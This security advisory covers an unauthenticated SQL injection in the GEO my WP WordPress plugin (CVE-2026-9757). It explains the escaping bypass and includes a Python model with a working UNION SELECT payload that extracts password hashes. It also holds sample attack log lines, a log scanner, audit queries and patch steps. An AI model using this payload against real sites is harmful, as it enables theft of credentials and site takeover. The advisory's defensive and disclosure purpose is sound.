GEO my WP WordPress Plugin SQL Injection (CVE-2026-9757): Unauthenticated Database Access via Bypassed Input Sanitisation

An unauthenticated SQL injection vulnerability in the GEO my WP WordPress plugin, tracked as CVE-2026-9757, allows a remote attacker to run arbitrary SQL against the WordPress database without logging in. The vulnerability carries a CVSS v3.1 base score of 7.5 (High) and is notable because the tainted values sidestep the escaping WordPress applies to request parameters, which makes it trivially exploitable against any internet-facing site that exposes the plugin's location search.

What Is the Vulnerability?

CVE-2026-9757 is an SQL injection vulnerability in the GEO my WP plugin's location search functionality. It sits in the gmw_get_locations_within_boundaries_sql() function, which reads the swlatlng and nelatlng URL parameters (the latitude/longitude of the south-west and north-east corners of the search area) and builds the SQL for the bounding-box geospatial query from them.

What makes this vulnerability particularly dangerous is how it sidesteps the escaping WordPress normally applies to request input. On every request wp_magic_quotes() runs add_magic_quotes() (PHP addslashes()) over $_GET, $_POST, $_COOKIE and $_SERVER and rebuilds $_REQUEST from the slashed $_GET and $_POST, so a quote sent as %27 reaches a plugin as \' and is harmless inside a quoted SQL string literal. GEO my WP, however, does not read $_GET: it re-parses $_SERVER['QUERY_STRING'] with PHP's parse_str(). That value is still percent-encoded when the slashing runs, so there is no literal quote for it to escape, and parse_str() then decodes %27 into a bare quote after WordPress's escaping has already happened. The plugin splits each parameter on commas with explode() and interpolates the pieces straight into a SQL BETWEEN clause without escaping or parameterisation. Note that the slashing is a legacy safety net rather than a sanitiser: it only ever helps when a value lands inside a quoted string literal, and it would not help at all if the coordinates were interpolated unquoted.

An attacker can supply SQL fragments in the swlatlng or nelatlng parameters of any URL that triggers the GEO my WP location search. Because the injection lands in the plugin's SELECT, the direct result is read access to the database: user logins, password hashes and any application secrets stored in it can be extracted, and cracked or reused credentials are then the route to full site compromise.
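The flow described above, as an added example in Python rather than the plugin's PHP (it models the described behaviour and is not the plugin's code): addslashes() and parse_str() are re-implemented for the two inputs; the query shape, table names and column names are assumptions, since the page gives neither the SQL nor the schema; and the values are assumed to be interpolated inside quotes, which is the case in which WordPress's slashing would otherwise have blocked a quote. The attack string is constructed and runs against an in-memory SQLite database standing in for MySQL. Two details of the payload are worth noticing: the comment marker is "-- " with a trailing space because MySQL requires it, and the payload avoids commas, because the explode(',') step would otherwise cut it apart before it reached the query (hence "UNION SELECT *" against a table whose column count matches).

```python
import sqlite3
from urllib.parse import unquote_plus


def addslashes(s):
    """Model of PHP addslashes(), which WordPress's wp_magic_quotes() applies
    to the request superglobals: backslash-escape backslash, quotes and NUL."""
    out = []
    for ch in s:
        if ch in "\\'\"":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_parse_str(query_string):
    """Model of PHP parse_str(): split on '&', percent-decode, last key wins."""
    params = {}
    for pair in query_string.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def get_after_magic_quotes(query_string):
    """$_GET as a plugin sees it: PHP decodes first, WordPress slashes after,
    so a quote sent as %27 arrives backslash-escaped."""
    return {k: addslashes(v) for k, v in php_parse_str(query_string).items()}


def magic_quotes_is_noop_on_query_string(query_string):
    """QUERY_STRING is still percent-encoded when the slashing runs: %27 holds
    no quote to escape, and the plugin's own parse_str() decodes it later."""
    return addslashes(query_string) == query_string


# Assumed shape of the vulnerable query (the plugin's real SQL is not on the
# page); values sit inside quotes, the case where slashing would have mattered.
VULN_SQL = (
    "SELECT object_id, latitude, longitude FROM gmw_locations "
    "WHERE latitude BETWEEN '{sw_lat}' AND '{ne_lat}' "
    "AND longitude BETWEEN '{sw_lng}' AND '{ne_lng}'"
)


def vulnerable_boundaries_sql(query_string):
    """Vulnerable flow: parse_str() on QUERY_STRING, explode on ',', interpolate."""
    params = php_parse_str(query_string)
    sw = params["swlatlng"].split(",")
    ne = params["nelatlng"].split(",")
    return VULN_SQL.format(sw_lat=sw[0], sw_lng=sw[1], ne_lat=ne[0], ne_lng=ne[1])


def hardened_boundaries_sql(query_string):
    """Hardened shape: each corner must be exactly two finite in-range numbers,
    bound as parameters (what $wpdb->prepare() with %f does). Raises ValueError."""
    params = php_parse_str(query_string)
    try:
        sw_lat, sw_lng = (float(v) for v in params["swlatlng"].split(","))
        ne_lat, ne_lng = (float(v) for v in params["nelatlng"].split(","))
    except (KeyError, ValueError):
        raise ValueError("swlatlng and nelatlng must each be two numbers")
    if not (-90 <= sw_lat <= 90 and -90 <= ne_lat <= 90):  # also rejects inf/nan
        raise ValueError("latitude out of range")
    if not (-180 <= sw_lng <= 180 and -180 <= ne_lng <= 180):
        raise ValueError("longitude out of range")
    sql = ("SELECT object_id, latitude, longitude FROM gmw_locations "
           "WHERE latitude BETWEEN ? AND ? AND longitude BETWEEN ? AND ?")
    return sql, (sw_lat, ne_lat, sw_lng, ne_lng)


def demo_db():
    """Constructed sample DB: two locations plus a 3-column wp_users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gmw_locations(object_id INTEGER, latitude REAL, longitude REAL);
        INSERT INTO gmw_locations VALUES (11, 51.5, -0.12), (12, 48.85, 2.35);
        CREATE TABLE wp_users(ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedHashForTheDemo');
    """)
    return db


# Constructed attacker request: quote as %27, '-- ' comment (MySQL needs the
# space), and no commas so explode(',') leaves the payload intact.
ATTACK_QS = "swlatlng=-90,-180&nelatlng=90,180%27%20UNION%20SELECT%20*%20FROM%20wp_users--%20"
BENIGN_QS = "swlatlng=51.4,-0.2&nelatlng=51.6,0.0"


def run_vulnerable(query_string):
    return demo_db().execute(vulnerable_boundaries_sql(query_string)).fetchall()


def run_hardened(query_string):
    sql, args = hardened_boundaries_sql(query_string)
    return demo_db().execute(sql, args).fetchall()


def hardened_rejects(query_string):
    try:
        hardened_boundaries_sql(query_string)
    except ValueError:
        return True
    return False
```

run_vulnerable(ATTACK_QS) returns the two location rows plus the admin row with its password hash, while the same query string sent as a normal $_GET parameter would have arrived as 180\' UNION ... and stayed inside the string literal on MySQL. The hardened version is the shape the real fix should take in PHP: is_numeric() plus a float cast on every piece, a range check, and $wpdb->prepare() with %f placeholders, so that the question of escaping never arises.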

The vulnerability is classified under CWE-89 (Improper Neutralization of Special Elements used in an SQL Command):

  • CVSS v3.1 Score: 7.5 (High)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (scope unchanged; a changed scope would give 7.4 with the same metrics)
  • Attack Vector: Network (AV:N)
  • Attack Complexity: Low (AC:L)
  • Privileges Required: None (PR:N)
  • User Interaction: None (UI:N)
  • Impact: High on confidentiality, none on integrity and availability (C:H/I:N/A:N), reflecting that the injection reads data through the search query rather than writing to the database

Which Versions Are Affected?

The vulnerability affects all versions of GEO my WP up to and including version 4.5.5:

  • GEO my WP — Geolocation, GeoDirectory, Maps: all versions up to and including 4.5.5

The fix was released in version 4.5.6. If your WordPress site is running GEO my WP version 4.5.5 or earlier, it is vulnerable.

Is It Being Exploited in the Wild?

No active exploitation had been publicly confirmed at the time of writing. That should not change the response. Unauthenticated SQL injection is among the most dangerous web vulnerability classes, and here the payload travels in a single crafted GET request that needs no session, no nonce and no user interaction, because the plugin reads the parameters from $_SERVER['QUERY_STRING'] in a form that WordPress's escaping never touches. Any internet-facing WordPress site that exposes a GEO my WP search form can have its database read this way. SQL injection bugs in WordPress plugins are routinely scanned for and exploited by automated tooling within hours of disclosure, so treat this as actively exploitable and patch immediately.

What Is the Fix?

The GEO my WP development team has released version 4.5.6 to address CVE-2026-9757. The fix corrects the SQL query construction in class-gmw-form-core.php to properly escape or parameterise user input. The official plugin page is available at:

https://wordpress.org/plugins/geo-my-wp/

Administrators should update GEO my WP to version 4.5.6 or later via the WordPress admin dashboard:

  • Navigate to Plugins > Installed Plugins
  • Locate GEO my WP
  • Click Update to version 4.5.6 or later
  • Alternatively, update via WP-CLI: wp plugin update geo-my-wp
  • Afterwards, confirm the installed version with: wp plugin get geo-my-wp --field=version

Recommendations

Update GEO my WP immediately. Unauthenticated SQL injection with no user interaction required is one of the most critical vulnerability classes for web applications. The bypass of WordPress’s built-in input sanitisation means exploitation requires nothing more than a single HTTP request with a crafted query string. Every internet-facing WordPress site running this plugin should be patched today.

Check for signs of exploitation. Because the plugin takes its parameters from the query string, every exploitation attempt is a GET request whose payload is recorded in the web server access log (default configurations log GET URLs but not POST bodies), so the evidence is there if you look. After updating, review access logs for requests to pages that host a GEO my WP search form whose swlatlng or nelatlng values are anything other than two plain numbers. URL-decode the values before matching: a quote arrives as %27 and the comment marker as --%20. Matching on SQL keywords (UNION, SELECT, SLEEP) or quote characters catches the obvious cases; treating any non-numeric value as a hit also catches double-encoded and obfuscated probes. Investigate any such request as a potential exploitation attempt, and treat many such requests from one client in a short period as a sign of blind, row-by-row extraction.
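To make that review concrete, here is an added Python scanner (not part of the original page or of the plugin) that applies the allow-list check rather than a keyword grep: it parses Combined Log Format lines, URL-decodes the two watched parameters, and reports every value that is not exactly "<number>,<number>". The log lines are constructed samples, the /locations/ path stands in for whichever page hosts the search form on a given site, and the function and constant names are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format (Apache/nginx default):
# client - user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# A legitimate corner is exactly "<number>,<number>"; anything else is suspect.
COORD_PAIR = re.compile(r"^-?\d+(?:\.\d+)?,-?\d+(?:\.\d+)?$")

WATCHED = ("swlatlng", "nelatlng")


def suspicious_requests(lines):
    """One finding per watched parameter value that is not a plain coordinate
    pair. Values are percent-decoded once first, so encoded quotes, spaces and
    comment markers are checked as the server decoded them; a double-encoded
    probe still fails the check because %27 is not a number either."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name in WATCHED:
            for value in params.get(name, []):
                if not COORD_PAIR.match(value):
                    findings.append({
                        "ip": m["ip"], "time": m["time"], "status": m["status"],
                        "param": name, "value": value,
                    })
    return findings


def scan_access_log(path):
    """Run the check over a log file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_requests(fh)


# Constructed sample lines: one legitimate search, one UNION attempt, one
# double-encoded time-based probe, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/May/2026:10:14:02 +0000] "GET /locations/?swlatlng=51.4,-0.2&nelatlng=51.6,0.0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/May/2026:10:14:09 +0000] "GET /locations/?swlatlng=-90,-180&nelatlng=90,180%27%20UNION%20SELECT%20*%20FROM%20wp_users--%20 HTTP/1.1" 200 9876 "-" "python-requests/2.31"',
    '198.51.100.7 - - [31/May/2026:10:14:15 +0000] "GET /locations/?swlatlng=-90,-180&nelatlng=90,180%2527%2520AND%2520SLEEP(5)--%2520 HTTP/1.1" 200 5123 "-" "python-requests/2.31"',
    '192.0.2.9 - - [31/May/2026:10:15:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["param"], repr(hit["value"]))
```

Run it with scan_access_log("/var/log/nginx/access.log") (or the Apache equivalent) and review the findings grouped by client; a 200 response to a UNION payload is the case to escalate, since it means the server served the injected query's output.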

Audit the WordPress database and rotate what may have leaked. The injection itself only reads data, which is why the CVSS integrity impact is rated none, so any attacker-created administrator account or injected content would come from a follow-on login using credentials taken from the database rather than from the injection directly. Check the users table for unexpected administrator accounts and recently registered users, review recently modified posts and pages for unauthorised changes, and, if the logs show attempts or you cannot rule them out, force a password reset for all users (administrators first) and rotate any API keys or other secrets the site stores in the database.
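The two audit queries below are an added example, not from the page or the plugin. They run here against a constructed SQLite copy of the three relevant WordPress tables using the default wp_ prefix (set TABLE_PREFIX to the site's $table_prefix from wp-config.php); the roles check relies on the fact that WordPress stores a user's roles in usermeta under the key <prefix>capabilities as a serialised PHP array, so an administrator row contains "administrator" in quotes. The cut-off date is an assumption: use the earliest time the site could have been hit.

```python
import sqlite3

TABLE_PREFIX = "wp_"  # $table_prefix from wp-config.php; change per site

# Administrator accounts registered on or after the cut-off. Roles live in
# usermeta as a serialised PHP array, e.g. a:1:{s:13:"administrator";b:1;}
RECENT_ADMINS_SQL = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM {p}users AS u
JOIN {p}usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = '{p}capabilities'
  AND m.meta_value LIKE '%"administrator"%'
  AND u.user_registered >= ?
ORDER BY u.user_registered DESC
"""

# Published posts and pages modified on or after the cut-off.
RECENT_CHANGES_SQL = """
SELECT ID, post_type, post_title, post_modified
FROM {p}posts
WHERE post_type IN ('post', 'page')
  AND post_status = 'publish'
  AND post_modified >= ?
ORDER BY post_modified DESC
"""


def recent_admins(db, since):
    """Administrator accounts registered at or after `since` (YYYY-MM-DD HH:MM:SS)."""
    return db.execute(RECENT_ADMINS_SQL.format(p=TABLE_PREFIX), (since,)).fetchall()


def recent_changes(db, since):
    """Published content modified at or after `since`."""
    return db.execute(RECENT_CHANGES_SQL.format(p=TABLE_PREFIX), (since,)).fetchall()


def audit_demo_db():
    """Constructed sample: the site's original admin, an editor, and an
    administrator account that appeared just before the disclosure date."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users(ID INTEGER, user_login TEXT, user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta(umeta_id INTEGER, user_id INTEGER, meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_posts(ID INTEGER, post_type TEXT, post_title TEXT, post_status TEXT, post_modified TEXT);
        INSERT INTO wp_users VALUES
            (1, 'admin',      'admin@example.com', '2024-01-10 09:00:00'),
            (2, 'editor-jo',  'jo@example.com',    '2025-03-02 12:00:00'),
            (3, 'wp-support', 'x@example.net',     '2026-05-30 23:41:07');
        INSERT INTO wp_usermeta VALUES
            (1, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
            (2, 2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}'),
            (3, 3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_posts VALUES
            (10, 'page', 'About', 'publish', '2025-06-01 08:00:00'),
            (11, 'page', 'Home',  'publish', '2026-05-31 00:02:19'),
            (12, 'post', 'Draft', 'draft',   '2026-05-31 00:03:00');
    """)
    return db


if __name__ == "__main__":
    db = audit_demo_db()
    since = "2026-05-25 00:00:00"  # assumed earliest possible exploitation time
    for row in recent_admins(db, since):
        print("ADMIN   ", row)
    for row in recent_changes(db, since):
        print("CHANGED ", row)
```

On a live site the same SQL can be run with wp db query "..." or a MySQL client, and the administrator list can be cross-checked with wp user list --role=administrator --fields=ID,user_login,user_registered. A hit in the first query is not proof of compromise on its own, but an administrator account nobody on the team created is.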

Consider a Web Application Firewall. Patching is the only complete remediation, but a WAF with SQL injection rules adds a layer of detection and blocking for this and future injection bugs in WordPress plugins. Check that the WAF inspects the query string of GET requests and URL-decodes it (including nested encoding) before its rules run: this payload is delivered entirely in GET parameters, so rule sets or logging tuned only for POST bodies will miss it.

This advisory was first covered in the broader Vulnerability Intelligence Report — May 31, 2026. For a comprehensive view of all active threats and newly disclosed vulnerabilities as of today, refer to the full report.
